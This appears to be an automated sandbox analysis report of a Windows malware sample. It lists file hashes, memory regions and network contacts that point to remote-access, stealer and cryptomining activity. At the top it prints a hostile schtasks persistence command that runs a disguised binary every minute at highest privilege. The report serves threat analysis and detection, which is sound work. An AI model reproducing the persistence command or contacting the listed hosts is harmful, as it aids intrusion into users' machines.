"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.nodejs.org udp
US 104.20.23.46:443 www.nodejs.org tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 46.23.20.104.in-addr.arpa udp
US 8.8.8.8:53 nodejs.org udp
US 104.20.23.46:443 nodejs.org tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 21.221.185.147.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 52.133.105.77.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 papka.top udp
US 172.67.169.72:80 papka.top tcp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 72.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 39.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
IE 52.111.236.21:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
FI 77.105.133.52:80 ozero.top tcp

Files

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

MD5 d25ebdfc04bdadea74017fa72f90781f
SHA1 f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA256 9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA512 77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

MD5 54276fc2dfafc0b610f08ba739a0f5ee
SHA1 dc61f3b768f2b1423c949d0ce761606f594aee8c
SHA256 9bb53f37a4b196c0031047936fbf6f029aa845d4610e77cabed1d370f04f229b
SHA512 9d5ed9cab660d270e4749d51bc4aefd251c64e6bd90fe70588668002522ac00148a33f03a1127141772f42c7e7a0510b3218a89e9e1209836cebb3371dbceb22

memory/4476-19-0x0000000000400000-0x0000000000D8F000-memory.dmp

memory/4048-22-0x00007FF8B5083000-0x00007FF8B5085000-memory.dmp

memory/4048-21-0x0000000000690000-0x0000000000710000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Result.exe

MD5 170b43350048ed4b6fca0e50a0178621
SHA1 db863b7b04a7c58baa9120e2f184517ed27a7252
SHA256 248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
SHA512 e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

MD5 7d4b84a8c3d14cb3d1bb864719463404
SHA1 544cf51aec717c63552f0fdf97d364b1b62a7a0c
SHA256 3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663
SHA512 d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

MD5 7529e4004c0fe742df146464e6aeadb0
SHA1 ae7341ee066b31de5a1a1a25851b70ced41de13f
SHA256 a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81
SHA512 d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

MD5 11fdce42422f8ed518fedf290f5bfc3c
SHA1 f18a4ad694af5ba50a7697b4cb66308454c555d9
SHA256 b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3
SHA512 4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

memory/2408-61-0x0000000000400000-0x0000000000CC7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 36b62ba7d1b5e149a2c297f11e0417ee
SHA1 ce1b828476274375e632542c4842a6b002955603
SHA256 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512 fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

C:\Users\Admin\AppData\Local\Temp\solara.exe

MD5 1797c0e37f4b9dd408cbf0d7bfcb7c95
SHA1 10df695351ac6074e23a3d3b4bd31a17c10fd614
SHA256 8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb
SHA512 52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1

C:\winNet\we9fgyC144zVOkGk.vbe

MD5 aa1a085aba94a5fc38c26b79a2217336
SHA1 f847af2aec7fd56fe8734ccb51d8027b9b4e817b
SHA256 f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545
SHA512 75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981

memory/4912-90-0x0000000000400000-0x000000000069B000-memory.dmp

memory/2616-93-0x0000000000840000-0x000000000090E000-memory.dmp

memory/2616-94-0x0000000005660000-0x0000000005C04000-memory.dmp

C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

MD5 3492e48fb2e9fb2bfc18658e3d8f88bd
SHA1 34cec8222aedc8baf774aa863a041a23971c7631
SHA256 c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e
SHA512 a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

MD5 1a3448b944b91cebda73adc5064e6286
SHA1 4f8716c6e56a675944a5f0f250947c8d45a362e1
SHA256 5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5
SHA512 b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

MD5 83a7f739f51f1acd83f143afa6ec1533
SHA1 2f653f906842f8f507d02f81550eb26a35f38acc
SHA256 5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545
SHA512 c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

MD5 9cf4017a8383ae846a908c79a28354bf
SHA1 adbe6a02b90147431e80fc38100de42d88dd765a
SHA256 bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2
SHA512 490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00

memory/3112-108-0x0000000000890000-0x0000000000A14000-memory.dmp

memory/3112-109-0x0000000002A90000-0x0000000002A9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

MD5 0e4e9aa41d24221b29b19ba96c1a64d0
SHA1 231ade3d5a586c0eb4441c8dbfe9007dc26b2872
SHA256 5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d
SHA512 e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

C:\Windows\Installer\MSID34E.tmp

MD5 9fe9b0ecaea0324ad99036a91db03ebb
SHA1 144068c64ec06fc08eadfcca0a014a44b95bb908
SHA256 e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9
SHA512 906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

C:\Windows\Installer\MSID39E.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

memory/3112-134-0x0000000002AC0000-0x0000000002ADC000-memory.dmp

memory/3112-136-0x0000000002AA0000-0x0000000002AA8000-memory.dmp

memory/3112-138-0x0000000002C60000-0x0000000002C70000-memory.dmp

memory/3112-137-0x0000000002AE0000-0x0000000002AF6000-memory.dmp

memory/3112-135-0x000000001C270000-0x000000001C2C0000-memory.dmp

memory/3112-139-0x000000001B680000-0x000000001B68E000-memory.dmp

memory/3112-140-0x000000001B690000-0x000000001B69E000-memory.dmp

memory/3112-142-0x000000001B6B0000-0x000000001B6BC000-memory.dmp

memory/3112-141-0x000000001B6A0000-0x000000001B6AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jlnrlnf2.4sw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1952-179-0x000001B0F8BD0000-0x000001B0F8BF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QgayOGv9z8.bat

MD5 3ab77dd445fd66bfbf53fa77e76ca717
SHA1 8c941b872eaff0836911c28a3a9513229eeabd55
SHA256 694064b5d84338be1d26f542f30af9ea4206da1657de255d9deb861eee78f424
SHA512 7dbea52d4dc3727619afb44e8a0004eac3eb564af518d61d355bf19c8db29a5a21285c9e48e6713c87bfeed20adefd3084316d4ba1a20b2632a43e27064d578e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

C:\Windows\Installer\MSIF05F.tmp

MD5 7a86ce1a899262dd3c1df656bff3fb2c
SHA1 33dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541
SHA256 b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c
SHA512 421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec

C:\Windows\xdwd.dll

MD5 16e5a492c9c6ae34c59683be9c51fa31
SHA1 97031b41f5c56f371c28ae0d62a2df7d585adaba
SHA256 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA512 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

memory/5836-340-0x00000159A7490000-0x00000159A76B1000-memory.dmp

memory/5836-343-0x00000159C20E0000-0x00000159C2300000-memory.dmp

memory/5836-344-0x00000159A9430000-0x00000159A9442000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Refcrt.exe.log

MD5 c6ecc3bc2cdd7883e4f2039a5a5cf884
SHA1 20c9dd2a200e4b0390d490a7a76fa184bfc78151
SHA256 b3d90663a46ee5333f8f99df4d43c0c76bf3902e3ba3ab36c0903027176d340d
SHA512 892a8f8e50ff350e790e1543032c64b3e1c050198b1810f89b6ce8a23de947a3e8299e880f0e79da7e4b5373a6b95e7dd7814cd5d7406a1553ef104ff2ff091e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 67e8893616f805af2411e2f4a1411b2a
SHA1 39bf1e1a0ddf46ce7c136972120f512d92827dcd
SHA256 ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31
SHA512 164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

memory/5312-420-0x00000000007A0000-0x0000000000936000-memory.dmp

C:\Users\Public\AccountPictures\upfc.exe

MD5 e41ef428aaa4841f258a38dc1cc305ef
SHA1 edf3a17831e013b74479e2e635b8cf0c1b3787ce
SHA256 6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995
SHA512 a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

memory/4168-471-0x0000000000FD0000-0x00000000011AA000-memory.dmp

memory/4168-473-0x0000000003280000-0x000000000328E000-memory.dmp

memory/4168-475-0x0000000003300000-0x000000000331C000-memory.dmp

memory/4168-477-0x0000000003320000-0x0000000003338000-memory.dmp

memory/4168-479-0x00000000032E0000-0x00000000032EC000-memory.dmp

memory/4048-607-0x00000000029C0000-0x00000000029DE000-memory.dmp

memory/4048-606-0x00000000027F0000-0x00000000027FC000-memory.dmp

memory/4048-605-0x000000001BD30000-0x000000001BDA6000-memory.dmp

memory/4540-699-0x000000001D120000-0x000000001D2E2000-memory.dmp

memory/4540-759-0x000000001DB20000-0x000000001E048000-memory.dmp

memory/4048-846-0x00007FF8B5083000-0x00007FF8B5085000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 c1a4a4340b4aaf6b72487d4d011fdee9
SHA1 c1a25eeeb340d226fa996fd8b6e9559d3112b4c5
SHA256 858259d792411041f71a344c219b120bd494de51529259dac6846ae8e7e9bc19
SHA512 76316cb27ac8729ab8f972229c25e521213295c2a6b21b073cb9b258b056e85facd86754abbf1a7e89b7516a1a184b6826a078ddb56f4c9bb2de5c3844929f37

memory/5176-1153-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5176-1154-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5176-1157-0x00000000003E0000-0x0000000000400000-memory.dmp

memory/5176-1182-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5176-1185-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5176-1186-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5176-1184-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5176-1183-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

MD5 b020de8f88eacc104c21d6e6cacc636d
SHA1 20b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA256 3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA512 4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

memory/5176-1597-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3176-1801-0x0000018752150000-0x0000018752156000-memory.dmp

memory/3176-1806-0x00000187524D0000-0x00000187524D6000-memory.dmp

C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

MD5 d2cf52aa43e18fdc87562d4c1303f46a
SHA1 58fb4a65fffb438630351e7cafd322579817e5e1
SHA256 45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA512 54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

C:\Users\Admin\AppData\Local\Temp\TVSs4LmGCN

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Temp\M8NaZBdXZD

MD5 20698b0aeafa51b961cd383ef3f99ccb
SHA1 a81cf3b3e1da80e1a99faf0cc47e6f93087b755c
SHA256 9e58a7cfc4125c430dc8aa17d4aaeac7646efc556bb26f859559b957f68240dd
SHA512 85bf507f86a743343141d0654ab47db8ccf1674de25e742be7c5f3925befcaac917b5e65d8b9a9272de05c250dd442e0b1bcdae68947c7e418adebde9f2e37fe

C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

MD5 5ad87d95c13094fa67f25442ff521efd
SHA1 01f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA256 67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA512 7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

MD5 7428aa9f83c500c4a434f8848ee23851
SHA1 166b3e1c1b7d7cb7b070108876492529f546219f
SHA256 1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512 c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

C:\Users\Admin\AppData\Local\Temp\EtV2Ktt2V7

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\onFIzuzEuF

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

MD5 d7c8fab641cd22d2cd30d2999cc77040
SHA1 d293601583b1454ad5415260e4378217d569538e
SHA256 04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512 278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

MD5 bc0c0eeede037aa152345ab1f9774e92
SHA1 56e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA256 7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA512 5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

MD5 f0bd53316e08991d94586331f9c11d97
SHA1 f5a7a6dc0da46c3e077764cfb3e928c4a75d383e
SHA256 dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef
SHA512 fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

memory/5176-2396-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5176-2408-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5176-2405-0x0000000140000000-0x0000000140786000-memory.dmp